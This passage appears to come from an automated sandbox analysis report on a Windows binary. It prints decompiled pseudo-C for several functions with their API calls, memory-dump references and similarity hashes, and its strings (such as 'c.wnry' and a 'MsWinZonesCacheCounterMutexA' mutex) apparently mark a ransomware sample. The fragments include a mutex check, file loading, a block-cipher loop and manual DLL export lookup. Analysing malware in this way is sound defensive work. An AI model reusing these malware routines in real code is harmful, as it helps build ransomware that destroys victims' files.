                    0x00407080
                    0x00407091
                    0x00407091
                    0x00407097
                    0x0040709a
                    0x0040709e
                    0x004070a5
                    0x004070a7
                    0x004070a9
                    0x004070ab
                    0x004070b1
                    0x004070b1
                    0x004070b3
                    0x004070b6
                    0x004070b7
                    0x004070bd
                    0x004070bf
                    0x004070ca
                    0x004070cf
                    0x004070df
                    0x004070e4
                    0x004070e7
                    0x004070f1
                    0x004070fb
                    0x00407101
                    0x0040710a
                    0x00407118
                    0x00407121
                    0x00000000
                    0x0040712c
                    0x00407121
                    0x00407135

                    APIs
                    • GetFileAttributesA.KERNEL32(?,?,?), ref: 00407083
                    • CreateDirectoryA.KERNEL32(?,00000000), ref: 00407091
                    • memcpy.MSVCRT(?,0000002F,0000002F,?,?,?), ref: 004070CA
                    • strcpy.MSVCRT(00000000,?,?,?), ref: 004070FB
                    • strcat.MSVCRT(00000000,0000002F,?,?), ref: 0040710A
                    • GetFileAttributesA.KERNEL32(00000000,?,?), ref: 00407118
                    • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 0040712C
                    Memory Dump Source
                    • Source File: 00000002.00000002.310444213.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000002.00000002.310436542.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310453495.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310462960.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310470058.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310783041.0000000000540000.00000002.00000001.01000000.00000005.sdmpDownload File
                    Yara matches
                    Similarity
                    • API ID: AttributesCreateDirectoryFile$memcpystrcatstrcpy
                    • String ID:
                    • API String ID: 2935503933-0
                    • Opcode ID: 0838382564994867704b48d197d9141456e9ef10b941a736ac2fad3accdc9566
                    • Instruction ID: 50ba023859918e707bf45bf33fbe73a6a33da9a39eec2eddc6b78618a8cc3524
                    • Opcode Fuzzy Hash: 0838382564994867704b48d197d9141456e9ef10b941a736ac2fad3accdc9566
                    • Instruction Fuzzy Hash: 1A112B72C0821456CB305B749D88FD7776C9B11320F1403BBE595B32C2DA78BD898669
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00401EFF Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 35sleepCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E00401EFF(intOrPtr _a4) {
				char _v104;
				void* _t9;
				void* _t11;
				void* _t12;

				sprintf( &_v104, "%s%d", "Global\\MsWinZonesCacheCounterMutexA", 0);
				_t12 = 0;
				if(_a4 <= 0) {
					L3:
					return 0;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t9 = OpenMutexA(0x100000, 1,  &_v104);
					if(_t9 != 0) {
						break;
					}
					Sleep(0x3e8);
					_t12 = _t12 + 1;
					if(_t12 < _a4) {
						continue;
					}
					goto L3;
				}
				CloseHandle(_t9);
				_t11 = 1;
				return _t11;
			}







                    0x00401f16
                    0x00401f1c
                    0x00401f24
                    0x00401f4c
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00401f26
                    0x00401f26
                    0x00401f31
                    0x00401f39
                    0x00000000
                    0x00000000
                    0x00401f40
                    0x00401f46
                    0x00401f4a
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00401f4a
                    0x00401f52
                    0x00401f5a
                    0x00000000

                    APIs
                    • sprintf.MSVCRT(?,%s%d,Global\MsWinZonesCacheCounterMutexA,00000000), ref: 00401F16
                    • OpenMutexA.KERNEL32(00100000,00000001,?), ref: 00401F31
                    • Sleep.KERNEL32(000003E8), ref: 00401F40
                    • CloseHandle.KERNEL32(00000000), ref: 00401F52
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.310444213.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000002.00000002.310436542.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310453495.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310462960.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310470058.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310783041.0000000000540000.00000002.00000001.01000000.00000005.sdmpDownload File
                    Yara matches
                    Similarity
                    • API ID: CloseHandleMutexOpenSleepsprintf
                    • String ID: %s%d$Global\MsWinZonesCacheCounterMutexA
                    • API String ID: 2780352083-2959021817
                    • Opcode ID: d195781efe0b704a0c45d33d3827b966fde6c598e7eccee7cfdb972a19423a06
                    • Instruction ID: f4a3b48a0bafa41ae68b0177be176e29d76f271436d11399ade0a1af8f7a19ee
                    • Opcode Fuzzy Hash: d195781efe0b704a0c45d33d3827b966fde6c598e7eccee7cfdb972a19423a06
                    • Instruction Fuzzy Hash: 92F0E931A40305BBDB20EBA49E4AB9B7758AB04B40F104036F945FA0D2DBB8D54586D8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00403A77 Relevance: 9.1, APIs: 6, Instructions: 123COMMON
                    Download Yara Rule
                    C-Code - Quality: 59%
                    			E00403A77(void* __ecx, void* _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				void* _v12;
				char _v16;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v48;
				signed int _t121;
				int _t124;
				intOrPtr* _t126;
				intOrPtr _t127;
				int _t131;
				intOrPtr* _t133;
				intOrPtr _t135;
				intOrPtr _t137;
				signed int _t139;
				signed int _t140;
				signed int _t143;
				signed int _t150;
				intOrPtr _t160;
				int _t161;
				int _t163;
				signed int _t164;
				signed int _t165;
				intOrPtr _t168;
				void* _t169;
				signed int _t170;
				signed int _t172;
				signed int _t175;
				signed int _t178;
				intOrPtr _t194;
				void* _t195;
				void* _t196;
				void* _t197;
				intOrPtr _t198;
				void* _t201;

				_t197 = __ecx;
				if( *((intOrPtr*)(__ecx + 4)) == 0) {
					__imp__??0exception@@QAE@ABQBD@Z(0x40f570);
					_push(0x40d570);
					_push( &_v16);
					L0040776E();
				}
				_t121 = _a12;
				if(_t121 == 0) {
					L15:
					__imp__??0exception@@QAE@ABQBD@Z(0x40f574);
					_push(0x40d570);
					_push( &_v16);
					L0040776E();
					_push( &_v16);
					_push(0);
					_push(_t197);
					_t198 = _v36;
					_t194 = _v32;
					_t168 =  *((intOrPtr*)(_t198 + 0x30));
					_t160 =  *((intOrPtr*)(_t198 + 0x34));
					_t71 = _t194 + 0xc; // 0x40d568
					_v48 =  *_t71;
					_v32 = _t168;
					if(_t168 > _t160) {
						_t160 =  *((intOrPtr*)(_t198 + 0x2c));
					}
					_t75 = _t194 + 0x10; // 0x19930520
					_t124 =  *_t75;
					_t161 = _t160 - _t168;
					if(_t161 > _t124) {
						_t161 = _t124;
					}
					if(_t161 != 0 && _a8 == 0xfffffffb) {
						_a8 = _a8 & 0x00000000;
					}
					 *((intOrPtr*)(_t194 + 0x14)) =  *((intOrPtr*)(_t194 + 0x14)) + _t161;
					 *(_t194 + 0x10) = _t124 - _t161;
					_t126 =  *((intOrPtr*)(_t198 + 0x38));
					if(_t126 != 0) {
						_t137 =  *_t126( *((intOrPtr*)(_t198 + 0x3c)), _t168, _t161);
						 *((intOrPtr*)(_t198 + 0x3c)) = _t137;
						_t201 = _t201 + 0xc;
						 *((intOrPtr*)(_t194 + 0x30)) = _t137;
					}
					if(_t161 != 0) {
						memcpy(_v12, _a4, _t161);
						_v12 = _v12 + _t161;
						_t201 = _t201 + 0xc;
						_a4 = _a4 + _t161;
					}
					_t127 =  *((intOrPtr*)(_t198 + 0x2c));
					if(_a4 == _t127) {
						_t169 =  *((intOrPtr*)(_t198 + 0x28));
						_a4 = _t169;
						if( *((intOrPtr*)(_t198 + 0x34)) == _t127) {
							 *((intOrPtr*)(_t198 + 0x34)) = _t169;
						}
						_t99 = _t194 + 0x10; // 0x19930520
						_t131 =  *_t99;
						_t163 =  *((intOrPtr*)(_t198 + 0x34)) - _t169;
						if(_t163 > _t131) {
							_t163 = _t131;
						}
						if(_t163 != 0 && _a8 == 0xfffffffb) {
							_a8 = _a8 & 0x00000000;
						}
						 *((intOrPtr*)(_t194 + 0x14)) =  *((intOrPtr*)(_t194 + 0x14)) + _t163;
						 *(_t194 + 0x10) = _t131 - _t163;
						_t133 =  *((intOrPtr*)(_t198 + 0x38));
						if(_t133 != 0) {
							_t135 =  *_t133( *((intOrPtr*)(_t198 + 0x3c)), _t169, _t163);
							 *((intOrPtr*)(_t198 + 0x3c)) = _t135;
							_t201 = _t201 + 0xc;
							 *((intOrPtr*)(_t194 + 0x30)) = _t135;
						}
						if(_t163 != 0) {
							memcpy(_v12, _a4, _t163);
							_v12 = _v12 + _t163;
							_a4 = _a4 + _t163;
						}
					}
					 *(_t194 + 0xc) = _v12;
					 *((intOrPtr*)(_t198 + 0x30)) = _a4;
					return _a8;
				} else {
					_t170 =  *(_t197 + 0x3cc);
					if(_t121 % _t170 != 0) {
						goto L15;
					} else {
						if(_a16 != 1) {
							_t195 = _a4;
							_t139 = _a12;
							_a16 = 0;
							_t164 = _a8;
							if(_a16 != 2) {
								_t140 = _t139 / _t170;
								if(_t140 > 0) {
									do {
										E00403797(_t197, _t195, _t164);
										_t172 =  *(_t197 + 0x3cc);
										_t195 = _t195 + _t172;
										_t143 = _a12 / _t172;
										_t164 = _t164 + _t172;
										_a16 = _a16 + 1;
									} while (_a16 < _t143);
									return _t143;
								}
							} else {
								_t140 = _t139 / _t170;
								if(_t140 > 0) {
									do {
										E0040350F(_t197, _t197 + 0x3f0, _t164);
										E00403A28(_t197, _t164, _t195);
										memcpy(_t197 + 0x3f0, _t195,  *(_t197 + 0x3cc));
										_t175 =  *(_t197 + 0x3cc);
										_t201 = _t201 + 0xc;
										_t150 = _a12 / _t175;
										_t195 = _t195 + _t175;
										_t164 = _t164 + _t175;
										_a16 = _a16 + 1;
									} while (_a16 < _t150);
									return _t150;
								}
							}
						} else {
							_t196 = _a4;
							_t140 = _a12 / _t170;
							_a16 = 0;
							_t165 = _a8;
							if(_t140 > 0) {
								do {
									E00403797(_t197, _t196, _t165);
									E00403A28(_t197, _t165, _t197 + 0x3f0);
									memcpy(_t197 + 0x3f0, _t196,  *(_t197 + 0x3cc));
									_t178 =  *(_t197 + 0x3cc);
									_t201 = _t201 + 0xc;
									_t140 = _a12 / _t178;
									_t196 = _t196 + _t178;
									_t165 = _t165 + _t178;
									_a16 = _a16 + 1;
								} while (_a16 < _t140);
							}
						}
						return _t140;
					}
				}
			}





































                    0x00403a7f
                    0x00403a87
                    0x00403a91
                    0x00403a9a
                    0x00403a9f
                    0x00403aa0
                    0x00403aa0
                    0x00403aa5
                    0x00403aaa
                    0x00403bba
                    0x00403bc2
                    0x00403bcb
                    0x00403bd0
                    0x00403bd1
                    0x00403bd9
                    0x00403bda
                    0x00403bdb
                    0x00403bdc
                    0x00403be0
                    0x00403be3
                    0x00403be6
                    0x00403be9
                    0x00403bee
                    0x00403bf1
                    0x00403bf4
                    0x00403bf6
                    0x00403bf6
                    0x00403bf9
                    0x00403bf9
                    0x00403bfc
                    0x00403c00
                    0x00403c02
                    0x00403c02
                    0x00403c06
                    0x00403c0e
                    0x00403c0e
                    0x00403c12
                    0x00403c17
                    0x00403c1a
                    0x00403c1f
                    0x00403c26
                    0x00403c28
                    0x00403c2b
                    0x00403c2e
                    0x00403c2e
                    0x00403c33
                    0x00403c3c
                    0x00403c41
                    0x00403c44
                    0x00403c47
                    0x00403c47
                    0x00403c4a
                    0x00403c50
                    0x00403c52
                    0x00403c58
                    0x00403c5b
                    0x00403c5d
                    0x00403c5d
                    0x00403c63
                    0x00403c63
                    0x00403c66
                    0x00403c6a
                    0x00403c6c
                    0x00403c6c
                    0x00403c70
                    0x00403c78
                    0x00403c78
                    0x00403c7c
                    0x00403c81
                    0x00403c84
                    0x00403c89
                    0x00403c90
                    0x00403c92
                    0x00403c95
                    0x00403c98
                    0x00403c98
                    0x00403c9d
                    0x00403ca6
                    0x00403cab
                    0x00403cb1
                    0x00403cb1
                    0x00403c9d
                    0x00403cb7
                    0x00403cbd
                    0x00403cc7
                    0x00403ab0
                    0x00403ab0
                    0x00403abc
                    0x00000000
                    0x00403ac2
                    0x00403ac6
                    0x00403b2c
                    0x00403b2f
                    0x00403b32
                    0x00403b35
                    0x00403b38
                    0x00403b8d
                    0x00403b91
                    0x00403b93
                    0x00403b97
                    0x00403b9c
                    0x00403ba7
                    0x00403ba9
                    0x00403bab
                    0x00403bad
                    0x00403bb0
                    0x00000000
                    0x00403b93
                    0x00403b3a
                    0x00403b3c
                    0x00403b40
                    0x00403b42
                    0x00403b4c
                    0x00403b55
                    0x00403b68
                    0x00403b6d
                    0x00403b78
                    0x00403b7b
                    0x00403b7d
                    0x00403b7f
                    0x00403b81
                    0x00403b84
                    0x00000000
                    0x00403b42
                    0x00403b40
                    0x00403ac8
                    0x00403acb
                    0x00403ace
                    0x00403ad0
                    0x00403ad3
                    0x00403ad8
                    0x00403ada
                    0x00403ade
                    0x00403aed
                    0x00403b00
                    0x00403b05
                    0x00403b10
                    0x00403b13
                    0x00403b15
                    0x00403b17
                    0x00403b19
                    0x00403b1c
                    0x00403ada
                    0x00403ad8
                    0x00403b25
                    0x00403b25
                    0x00403abc

                    APIs
                    • ??0exception@@QAE@ABQBD@Z.MSVCRT(0040F570,?,?,?,?,?,00000001), ref: 00403A91
                    • _CxxThrowException.MSVCRT(?,0040D570,?,?,?,?,00000001), ref: 00403AA0
                    • memcpy.MSVCRT(?,?,?,?,?,?,?,?), ref: 00403B00
                    • memcpy.MSVCRT(?,?,?,?,?,?,?,?), ref: 00403B68
                    • ??0exception@@QAE@ABQBD@Z.MSVCRT(0040F574,?,?,?,?,?,00000001), ref: 00403BC2
                    • _CxxThrowException.MSVCRT(?,0040D570,?,?,?,?,00000001), ref: 00403BD1
                    Memory Dump Source
                    • Source File: 00000002.00000002.310444213.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000002.00000002.310436542.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310453495.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310462960.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310470058.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310783041.0000000000540000.00000002.00000001.01000000.00000005.sdmpDownload File
                    Yara matches
                    Similarity
                    • API ID: ??0exception@@ExceptionThrowmemcpy
                    • String ID:
                    • API String ID: 2382887404-0
                    • Opcode ID: 8f0cb0103d3614fdc28d84a5f541c19cbd02f6e6265a1098423f4cf3f0921468
                    • Instruction ID: 9805a50700f74263afb1320d00d27f30e93ca80038ec105a2d2f515762341bf2
                    • Opcode Fuzzy Hash: 8f0cb0103d3614fdc28d84a5f541c19cbd02f6e6265a1098423f4cf3f0921468
                    • Instruction Fuzzy Hash: 8541C870B40206ABDB14DE65DD81D9B77BEEB84309B00443FF815B3281D778AB15C759
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00401000 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 38fileCOMMON
                    Download Yara Rule
                    APIs
                    • fopen.MSVCRT(c.wnry,0040E018), ref: 0040101B
                    • fread.MSVCRT(?,0000030C,00000001,00000000), ref: 0040103F
                    • fwrite.MSVCRT(?,0000030C,00000001,00000000), ref: 00401047
                    • fclose.MSVCRT(00000000), ref: 00401058
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.310444213.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000002.00000002.310436542.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310453495.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310462960.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310470058.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310783041.0000000000540000.00000002.00000001.01000000.00000005.sdmpDownload File
                    Yara matches
                    Similarity
                    • API ID: fclosefopenfreadfwrite
                    • String ID: c.wnry
                    • API String ID: 4000964834-3240288721
                    • Opcode ID: 83356dae967f3845aa64eafaf8b7e6f79fd4dc7784855bee587f11601882f661
                    • Instruction ID: 4fc4ee2583eead98f325da0eb4a8e2a7a7827d82b7f69226d67b1691b23a23d5
                    • Opcode Fuzzy Hash: 83356dae967f3845aa64eafaf8b7e6f79fd4dc7784855bee587f11601882f661
                    • Instruction Fuzzy Hash: 0CF05931204260ABCA301F656D4AA277B10DBC4F61F10083FF1C1F40E2CABD44C296BE
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004018F9 Relevance: 7.6, APIs: 5, Instructions: 79filememoryCOMMON
                    Download Yara Rule
                    C-Code - Quality: 24%
                    			E004018F9(intOrPtr _a4, intOrPtr _a8, CHAR* _a12) {
				struct _OVERLAPPED* _v8;
				char _v20;
				long _v32;
				struct _OVERLAPPED* _v36;
				long _v40;
				signed int _v44;
				void* _t18;
				void* _t28;
				long _t34;
				intOrPtr _t38;

				_push(0xffffffff);
				_push(0x4081f0);
				_push(0x4076f4);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t38;
				_v44 = _v44 | 0xffffffff;
				_v32 = 0;
				_v36 = 0;
				_v8 = 0;
				_t18 = CreateFileA(_a12, 0x80000000, 1, 0, 3, 0, 0);
				_v44 = _t18;
				if(_t18 != 0xffffffff) {
					_t34 = GetFileSize(_t18, 0);
					_v40 = _t34;
					if(_t34 != 0xffffffff && _t34 <= 0x19000) {
						_t28 = GlobalAlloc(0, _t34);
						_v36 = _t28;
						if(_t28 != 0 && ReadFile(_v44, _t28, _t34,  &_v32, 0) != 0) {
							_push(_a8);
							_push(0);
							_push(0);
							_push(_v32);
							_push(_t28);
							_push(_a4);
							if( *0x40f898() != 0) {
								_push(1);
								_pop(0);
							}
						}
					}
				}
				_push(0xffffffff);
				_push( &_v20);
				L004076FA();
				 *[fs:0x0] = _v20;
				return 0;
			}













                    0x004018fc
                    0x004018fe
                    0x00401903
                    0x0040190e
                    0x0040190f
                    0x0040191c
                    0x00401922
                    0x00401925
                    0x00401928
                    0x0040193a
                    0x00401940
                    0x00401946
                    0x00401950
                    0x00401952
                    0x00401958
                    0x0040196a
                    0x0040196c
                    0x00401971
                    0x00401987
                    0x0040198a
                    0x0040198b
                    0x0040198c
                    0x0040198f
                    0x00401990
                    0x0040199b
                    0x0040199d
                    0x0040199f
                    0x0040199f
                    0x0040199b
                    0x00401971
                    0x00401958
                    0x004019a0
                    0x004019a5
                    0x004019a6
                    0x004019d5
                    0x004019e0

                    APIs
                    • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,00401448,?), ref: 0040193A
                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,?,?,00401448,?), ref: 0040194A
                    • GlobalAlloc.KERNEL32(00000000,00000000,?,?,?,?,?,?,00401448,?), ref: 00401964
                    • ReadFile.KERNEL32(000000FF,00000000,00000000,?,00000000,?,?,?,?,?,?,00401448,?), ref: 0040197D
                    • _local_unwind2.MSVCRT(?,000000FF,?,?,?,?,?,?,00401448,?), ref: 004019A6
                    Memory Dump Source
                    • Source File: 00000002.00000002.310444213.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000002.00000002.310436542.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310453495.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310462960.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310470058.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310783041.0000000000540000.00000002.00000001.01000000.00000005.sdmpDownload File
                    Yara matches
                    Similarity
                    • API ID: File$AllocCreateGlobalReadSize_local_unwind2
                    • String ID:
                    • API String ID: 2811923685-0
                    • Opcode ID: 232dc3714e51fefb2f6fb0f5b065eea7eb2b0009f41f45388587d49ab84ddf28
                    • Instruction ID: fb063a64e2dc49fc25d010f75d45645ced701e765f932c996de96a45c5b9f027
                    • Opcode Fuzzy Hash: 232dc3714e51fefb2f6fb0f5b065eea7eb2b0009f41f45388587d49ab84ddf28
                    • Instruction Fuzzy Hash: B62160B1901624AFCB209B99CD48FDF7E78EB097B0F54022AF525B22E0D7785805C6AC
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00405BAE Relevance: 6.1, APIs: 4, Instructions: 93fileCOMMON
                    Download Yara Rule
                    C-Code - Quality: 97%
                    			E00405BAE(CHAR* _a4, intOrPtr _a8, long _a12, void* _a16) {
				char _v5;
				char _v6;
				long _t30;
				char _t32;
				long _t34;
				void* _t46;
				intOrPtr* _t49;
				long _t50;

				_t30 = _a12;
				if(_t30 == 1 || _t30 == 2 || _t30 == 3) {
					_t49 = _a16;
					_t46 = 0;
					_v6 = 0;
					 *_t49 = 0;
					_v5 = 0;
					if(_t30 == 1) {
						_t46 = _a4;
						_v5 = 0;
						L11:
						_t30 = SetFilePointer(_t46, 0, 0, 1);
						_v6 = _t30 != 0xffffffff;
						L12:
						_push(0x20);
						L00407700();
						_t50 = _t30;
						if(_a12 == 1 || _a12 == 2) {
							 *_t50 = 1;
							 *((char*)(_t50 + 0x10)) = _v5;
							_t32 = _v6;
							 *((char*)(_t50 + 1)) = _t32;
							 *(_t50 + 4) = _t46;
							 *((char*)(_t50 + 8)) = 0;
							 *((intOrPtr*)(_t50 + 0xc)) = 0;
							if(_t32 != 0) {
								 *((intOrPtr*)(_t50 + 0xc)) = SetFilePointer(_t46, 0, 0, 1);
							}
						} else {
							 *_t50 = 0;
							 *((intOrPtr*)(_t50 + 0x14)) = _a4;
							 *((char*)(_t50 + 1)) = 1;
							 *((char*)(_t50 + 0x10)) = 0;
							 *((intOrPtr*)(_t50 + 0x18)) = _a8;
							 *((intOrPtr*)(_t50 + 0x1c)) = 0;
							 *((intOrPtr*)(_t50 + 0xc)) = 0;
						}
						 *_a16 = 0;
						_t34 = _t50;
						goto L18;
					}
					if(_t30 != 2) {
						goto L12;
					}
					_t46 = CreateFileA(_a4, 0x80000000, 1, 0, 3, 0x80, 0);
					if(_t46 != 0xffffffff) {
						_v5 = 1;
						goto L11;
					}
					 *_t49 = 0x200;
					goto L8;
				} else {
					 *_a16 = 0x10000;
					L8:
					_t34 = 0;
					L18:
					return _t34;
				}
			}











                    0x00405bb2
                    0x00405bbb
                    0x00405bd2
                    0x00405bd7
                    0x00405bdc
                    0x00405bdf
                    0x00405be1
                    0x00405be4
                    0x00405c18
                    0x00405c1b
                    0x00405c24
                    0x00405c29
                    0x00405c32
                    0x00405c36
                    0x00405c36
                    0x00405c38
                    0x00405c42
                    0x00405c44
                    0x00405c6c
                    0x00405c6f
                    0x00405c72
                    0x00405c77
                    0x00405c7a
                    0x00405c7d
                    0x00405c80
                    0x00405c83
                    0x00405c90
                    0x00405c90
                    0x00405c4c
                    0x00405c4f
                    0x00405c51
                    0x00405c57
                    0x00405c5b
                    0x00405c5e
                    0x00405c61
                    0x00405c64
                    0x00405c64
                    0x00405c96
                    0x00405c98
                    0x00000000
                    0x00405c98
                    0x00405be9
                    0x00000000
                    0x00000000
                    0x00405c04
                    0x00405c09
                    0x00405c20
                    0x00000000
                    0x00405c20
                    0x00405c0b
                    0x00000000
                    0x00405bc7
                    0x00405bca
                    0x00405c11
                    0x00405c11
                    0x00405c9a
                    0x00405c9e
                    0x00405c9e

                    APIs
                    • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00000000,00000140,?,00406C12,00000000,00401DFE,00000001), ref: 00405BFE
                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,?,00000000,00000000,00000140,?,00406C12,00000000,00401DFE,00000001,00000000,004074EA,00000000), ref: 00405C29
                    • ??2@YAPAXI@Z.MSVCRT(00000020,?,?,00000000,00000000,00000140,?,00406C12,00000000,00401DFE,00000001,00000000,004074EA,00000000,004020D5,?), ref: 00405C38
                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,?,?,00000000,00000000,00000140,?,00406C12,00000000,00401DFE,00000001,00000000,004074EA), ref: 00405C8A
                    Memory Dump Source
                    • Source File: 00000002.00000002.310444213.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000002.00000002.310436542.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310453495.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310462960.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310470058.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310783041.0000000000540000.00000002.00000001.01000000.00000005.sdmpDownload File
                    Yara matches
                    Similarity
                    • API ID: File$Pointer$??2@Create
                    • String ID:
                    • API String ID: 1331958074-0
                    • Opcode ID: ff1e72f22e15843ade9ace39703012fff21b8a1e8b9c48cc3c9963cb15211f94
                    • Instruction ID: 771dcc1d5a31089dd4cc2aab62cbbe5a226dda330bf0289da8f54b52fc8588cb
                    • Opcode Fuzzy Hash: ff1e72f22e15843ade9ace39703012fff21b8a1e8b9c48cc3c9963cb15211f94
                    • Instruction Fuzzy Hash: 0831F231008784AFDB318F28888479BBBF4EF15350F18896EF491A7380C375AD85CB69
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00402924 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73COMMON
                    Download Yara Rule
                    C-Code - Quality: 37%
                    			E00402924(intOrPtr* _a4, char _a8) {
				intOrPtr _v8;
				intOrPtr* _t26;
				intOrPtr* _t28;
				void* _t29;
				intOrPtr _t30;
				void* _t32;
				signed int _t33;
				signed int _t37;
				signed short* _t41;
				intOrPtr _t44;
				intOrPtr _t49;
				intOrPtr* _t55;
				intOrPtr _t58;
				void* _t59;

				_t26 = _a4;
				_t44 =  *((intOrPtr*)(_t26 + 4));
				_t28 =  *_t26 + 0x78;
				_v8 = _t44;
				if( *((intOrPtr*)(_t28 + 4)) == 0) {
					L11:
					SetLastError(0x7f);
					_t29 = 0;
				} else {
					_t58 =  *_t28;
					_t30 =  *((intOrPtr*)(_t58 + _t44 + 0x18));
					_t59 = _t58 + _t44;
					if(_t30 == 0 ||  *((intOrPtr*)(_t59 + 0x14)) == 0) {
						goto L11;
					} else {
						_t8 =  &_a8; // 0x402150
						if( *_t8 >> 0x10 != 0) {
							_t55 =  *((intOrPtr*)(_t59 + 0x20)) + _t44;
							_t41 =  *((intOrPtr*)(_t59 + 0x24)) + _t44;
							_a4 = 0;
							if(_t30 <= 0) {
								goto L11;
							} else {
								while(1) {
									_t32 =  *_t55 + _t44;
									_t15 =  &_a8; // 0x402150
									__imp___stricmp( *_t15, _t32);
									if(_t32 == 0) {
										break;
									}
									_a4 = _a4 + 1;
									_t55 = _t55 + 4;
									_t41 =  &(_t41[1]);
									if(_a4 <  *((intOrPtr*)(_t59 + 0x18))) {
										_t44 = _v8;
										continue;
									} else {
										goto L11;
									}
									goto L12;
								}
								_t33 =  *_t41 & 0x0000ffff;
								_t44 = _v8;
								goto L14;
							}
						} else {
							_t9 =  &_a8; // 0x402150
							_t37 =  *_t9 & 0x0000ffff;
							_t49 =  *((intOrPtr*)(_t59 + 0x10));
							if(_t37 < _t49) {
								goto L11;
							} else {
								_t33 = _t37 - _t49;
								L14:
								if(_t33 >  *((intOrPtr*)(_t59 + 0x14))) {
									goto L11;
								} else {
									_t29 =  *((intOrPtr*)( *((intOrPtr*)(_t59 + 0x1c)) + _t33 * 4 + _t44)) + _t44;
								}
							}
						}
					}
				}
				L12:
				return _t29;
			}

















                    0x00402928
                    0x0040292f
                    0x00402934
                    0x00402938
                    0x0040293e
                    0x004029a5
                    0x004029a7
                    0x004029ad
                    0x00402940
                    0x00402940
                    0x00402942
                    0x00402946
                    0x0040294a
                    0x00000000
                    0x00402951
                    0x00402951
                    0x0040295a
                    0x00402971
                    0x00402973
                    0x00402977
                    0x0040297a
                    0x00000000
                    0x0040297c
                    0x00402981
                    0x00402983
                    0x00402986
                    0x00402989
                    0x00402993
                    0x00000000
                    0x00000000
                    0x00402995
                    0x00402998
                    0x0040299f
                    0x004029a3
                    0x0040297e
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004029a3
                    0x004029b4
                    0x004029b7
                    0x00000000
                    0x004029b7
                    0x0040295c
                    0x0040295c
                    0x0040295c
                    0x00402960
                    0x00402965
                    0x00000000
                    0x00402967
                    0x00402967
                    0x004029ba
                    0x004029bd
                    0x00000000
                    0x004029bf
                    0x004029c8
                    0x004029c8
                    0x004029bd
                    0x00402965
                    0x0040295a
                    0x0040294a
                    0x004029af
                    0x004029b3

                    APIs
                    • _stricmp.MSVCRT(P!@,?,?,0000DDB6,?,?,?,00402150,00000000,TaskStart), ref: 00402989
                    • SetLastError.KERNEL32(0000007F,?,0000DDB6,?,?,?,00402150,00000000,TaskStart), ref: 004029A7
                    Strings
